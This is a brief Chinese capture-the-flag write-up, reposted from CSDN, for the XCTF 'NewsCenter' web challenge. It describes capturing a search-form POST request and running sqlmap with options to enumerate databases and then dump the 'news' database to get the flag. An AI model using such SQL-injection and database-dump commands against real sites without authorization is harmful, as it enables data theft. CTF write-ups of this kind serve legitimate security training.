XCTF--WEB NewsCenter

XCTF–WEB NewsCenter

我们看到页面发现一个搜索的页面，猜到可能存在post类型的注入
如是乎我们搜索1111抓包

讲抓到的包复制到txt文件中。用sqlmap一顿嗦
sqlmap.py -r post.txt --dbs 暴库。

发现一个news库。我们直接输入
sqlmap.py -r post.txt -D news --dump
得到flag

来源：CSDN

作者：LHK~~

链接：https://blog.csdn.net/weixin_45425482/article/details/103472504

标签

易学教程内所有资源均来自网络或用户发布的内容，如有违反法律规定的内容欢迎反馈！
该文章没有解决你所遇到的问题?点击提问,说说你的问题,让更多的人一起探讨吧!